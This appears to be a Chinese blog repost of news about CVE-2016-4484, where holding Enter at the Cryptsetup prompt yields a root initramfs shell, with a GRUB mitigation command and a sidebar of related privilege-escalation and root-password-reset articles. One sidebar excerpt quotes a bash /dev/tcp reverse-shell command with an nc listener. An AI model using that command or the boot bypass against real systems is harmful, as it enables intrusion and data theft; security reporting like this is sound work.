linux回车键七十秒root,Linux神奇漏洞:长按回车键70秒 Root权限到手

最新推荐文章于 2022-06-05 17:27:01 发布
最新推荐文章于 2022-06-05 17:27:01 发布
阅读量160 收藏 1
点赞数
文章标签: linux回车键七十秒root

一般来说获取系统Root权限是很困难的,尤其是加密系统中,但西班牙安全研究员Hector Marco、Ismael Ripoll发现,Linux系统下只需按住回车键70秒钟,就能轻松绕过系统认证,拿到Root权限,进而远程控制经过加密的Linux系统。

ffea175e476c927c9e04a4c9b5a76b5a.gif

这个问题来自Linux标准磁盘加密程序Cryptsetup的一个漏洞(CVE-2016-4484),它处理密码输入错误的时候,会允许用户多次重试输入,直到错误超过93次,程序就会给用户一个带Root权限的shell(busybox)。

也就是说,如果你重复93次输错密码,或者持续按回车键大概70秒,就能够获得root initramfs (initial RAM filesystem) shell。

之后,你就可以复制、修改或者破坏整个硬盘,也可以使用网络传输数据。加密磁盘内容不会泄露,但是攻击者可以提升权限、盗取信息、发起DoS攻击等等。

关键是,这个漏洞攻击的成功率非常高,因为它不依赖特定系统或者配置。在图书馆、ATM机、机场、实验室等场景下,它特别有用,因为在这些场景下开机的过程受到加密保护,而对外交互只有键盘/鼠标。

如果你使用了基于Linux的云服务,还可以在没有物理接触的情况下远程处罚漏洞。

a0180c836a380f09aa90446019f4080f.gif

这个漏洞影响范围很广,覆盖几乎所有的Linux发行版,包括Debian、Ubuntu、Fedora、Red Hat Enterprise Linux (RHEL)、SUSE,免疫的则有Arch Linux、Solus。

如果你的系统存在此漏洞,官方还没有发布补丁,可以自行修改cryptroot文件:

# sed -i 's/GRUB_CMDLINE_LINUX_DEFAULT="/GRUB_CMDLINE_LINUX_DEFAULT="panic=5 /' /etc/default/grub

# grub-install

0aac08e63264d38c87b6123b5f2ce2ff.gif

steventey
关注
Linux 内核中发现漏洞 低权限账户有可能获得 root 权限
llawliet0001的专栏
08-06 346
导读 在Linux内核中发现了一个漏洞,使一些低权限账户有可能在一些流行的发行版上获得 root 权限,包括 Ubuntu、Debian 和 Fedora 都受到了影响。该漏洞被命名为 Sequoia,它存在于文件系统层。 这个安全问题被认为影响了自 2014 年以来发布的所有版本的 Linux 内核,这意味着大量的发行版都有漏洞。具体来说,该漏洞是一个 size_t到 int 的类型转换漏洞,可以被利用来提升权限。 来自 Qualys 的安全研究人员写道:"我们在 Linux 内核的文..
利用Linux内核的多个安全漏洞获得root权限
weixin_34295316的博客
12-11 135
系统安全高手 Dan Rosenberg 发布了一段 C 程序,这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过: $ sudo apt-get...
Linux 曝出漏洞,各大发行版形同虚设:攻击者能获得系统全面的 root 权限
weixin_42803243的博客
02-22 5982
研究人员警告,Polkit的pkexec组件中曝出一个编号为CVE-2021-4034(PwnKit)的漏洞,它存在于所有主要的Linux发行版的默认配置中。攻击者一旦利用了它,就能获得系统全面的root权限。 CVE-2021-4034已被命名为PwnKit,起源可以追溯到12多年前初次提交的pkexec,这意味着所有Polkit版本统统受到影响。 Pkexec是Polkit开源应用程序框架的一部分,该框架负责协商特权进程和非特权进程之间的交互,pkexec允许授权用户以另一个用...
linux root回车又为空,Linuxroot用户
weixin_35682224的博客
05-12 481
1:设置root密码Ubuntu安装后root是没有默认的密码的,因为你还没给root设置密码sonce@sonce-desktop:~$ sudo -i[sudo] password for sonce:root@sonce-desktop:~# passwdEnter new UNIX password:Retype new UNIX password:passwd: password upd...
Linux与window下换行符引发的bug
xzymmd的博客
07-12 412
今天写一个读取txt文件中行数据再处理的程序一直输出错的结果,经查是在window下生成的txt文件格式为dos而传到linux上读取的时候应该改为unix格式。vim 文件下,做:set ff查看文件格式,再:set ff=unix即可换行符区别参考https://blog.csdn.net/wjcquking/article/details/6634504...
linux系统中重置mysql的root密码
09-10
Linux系统中,MySQL数据库是广泛使用的开源关系型数据库管理系统。有时,由于各种原因,我们可能会忘记MySQL的root管理员密码,这将导致无法正常访问数据库。不过不用担心,重置MySQL的root密码是一个相对简单的...
Linux忘记root密码及设置root密码的图文操作方法
09-15
Linux系统中,root用户拥有最高的系统权限,用于管理整个操作系统。然而,有时可能会出现忘记root密码的情况,这时需要通过特殊方法来重置密码。本文将详细介绍如何在Linux环境下,当忘记root密码时,通过进入单...
Linuxroot初始密码设置方法
09-15
输入后,按回车键。 2. 接下来,系统会让你设置root的新密码。在提示“Enter new UNIX password:”处,输入你希望设置的root密码。确保选择一个强密码,包含大写字母、小写字母、数字和特殊字符的组合,以提高安全...
Linux破解root密码的教程
09-15
1. **启动系统**:当Linux系统启动至GRUB启动菜单时,可以通过按下`e`键或回车键来进入GRUB的编辑模式。 - 这一步是为了能够手动编辑启动选项,从而改变系统的启动方式。 2. **选择内核启动项**:使用上下箭头键...
Linux忘记root密码解决方法
01-20
Linux忘记 root密码的解决办法?...这时候,如果是远程管理,那真没辙了。如果linux主机在你身边,那还是有救的。只要你按以下步骤来操作:  解决方法  重启系统后出现GRUB界面在引导装载...  回车后,按“b”键启动
回车键按下时,键盘会有什么反应
wydbyxr的博客
12-24 657
吐槽一句自己,这种贼偏门东西怎么也收录了…   为了从零开始,我们选择键盘上的回车键被按到最低处作为起点。在这个时刻,一个专用于回车键的电流回路被直接地或者通过电容器间接地闭合了,使得少量的电流进入了键盘的逻辑电路系统。这个系统会扫描每个键的状态,对于按键开关的电位弹跳变化进行噪音消除(debounce),并将其转化为键盘码值。在这里,回车的码值是13。键盘控制器在得到码值之后,将其编码,用于之后...
惊!Linux爆新漏洞回车键70即可获得 root 权限
绯浅yousa的笔记
11-19 700
惊!Linux爆新漏洞回车键70即可获得 root 权限 英文来源:thehackernews.com/2016/11/hacking-linux-system.html 译文来自:FreeBuf - freebuf.com/articles/system/120280.html 按住回车70,黑客就能在linux系统绕过认证,进而获取root权限,并能远程控制经过加密的li
Linux shell脚本 自动输入提示信息或回车进行下一步操作
热门推荐
BoomLee的博客
09-14 3万+
1.应用场景 有的时候执行安装或操作第三方软件时,需要输入Yes 或者回车 才能进行下一步 例如操作sqlite [root@lee sh]# sqlite3 anhui.db SQLite version 3.6.20 Enter ".help" for instructions Enter SQL statements terminated with a ";" sqlite>......
linux kernel 本地提权漏洞CVE-2013-1763 exploit 代码分析
weixin_34246551的博客
12-05 511
为什么80%的码农都做不了架构师?>>> ...
Linux因15年前的内核漏洞被获得 Root 权限
llawliet0001的专栏
03-28 176
导读 近日,在Linux内核的 iSCSI 子系统中发现的三个漏洞可能会允许具有基本用户权限的本地攻击者在未打补丁的 Linux 系统上获得 root 权限。 这些安全漏洞只能在本地被利用,这意味着潜在的攻击者将不得不通过利用另一个漏洞或使用其他攻击载体来访问受影响的设备。 15年之久的 Linux 内核漏洞 这些漏洞在 2006年 iSCSI 内核子系统的初始开发阶段就被引入,如今时隔 15 年,GRIMM 的研究人员终于发现了这些漏洞。 根据 GRIMM 安全研究员 Adam N..
Linux重置root密码和Linux基础命令
不知名白帽的博客
06-05 1504
linux重置root密码 一些Linux的基础命令,带有配图,方便理解。
linux系统漏洞firefart,记:从文件上传漏洞到获得root权限
weixin_33511258的博客
05-16 850
提权过程试了好几种方法。使用反向连接得到webshell,得到内核版本等信息#公网服务器使用nc监听nc -lvvp 1234#目标机器上执行命令bash -i >& /dev/tcp/公网服务器IP/端口 0>&1[www@centos]$ whoamiwww[www@centos]$ uname -auname -aLinux centos 2.6.32-431.e...
linux查找以root开头的行,14个grep命令使用例子
weixin_33834241的博客
05-13 3295
所有的类linux系统都会提供一个名为grep(global regular expression print,全局正则表达式输出)的搜索工具。grep命令在对一个或多个文件的内容进行基于模式的搜索的情况下是非常有用的。模式可以是单个字符、多个字符、单个单词、或者是一个句子。当命令匹配到执行命令时指定的模式时,grep会将包含模式的一行输出,但是并不对原文件内容进行修改。在本文中,我们将会讨论到1...
Linux 杀毒软件发现的漏洞可使得黑客获得 root 权限
snow2know的博客
02-23 1501
导读 McAfee VirusScan Enterprise for Linux 版本中的远程代码执行缺陷,使黑客可以获得 root 权限,安全研究人员称只需欺骗该 app 使用恶意更新服务器即可实现。 Linux 安全软件发现的漏洞可使得黑客获得 Root 权限 来自 MIT Lincoln Laboratory 的 Andrew Fasano 在他的帖子中提到,他
Red Hat Linux忘记root密码:恢复步骤详解
- 启动时在LILO提示符下输入`linux single`,回车启动到单用户模式。 - 进行与GRUB相同的操作:编辑`/etc/shadow`文件,重置root密码,然后重启。 2. **通过Linux救援模式重置root密码** - 首先,需要启动到救援...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值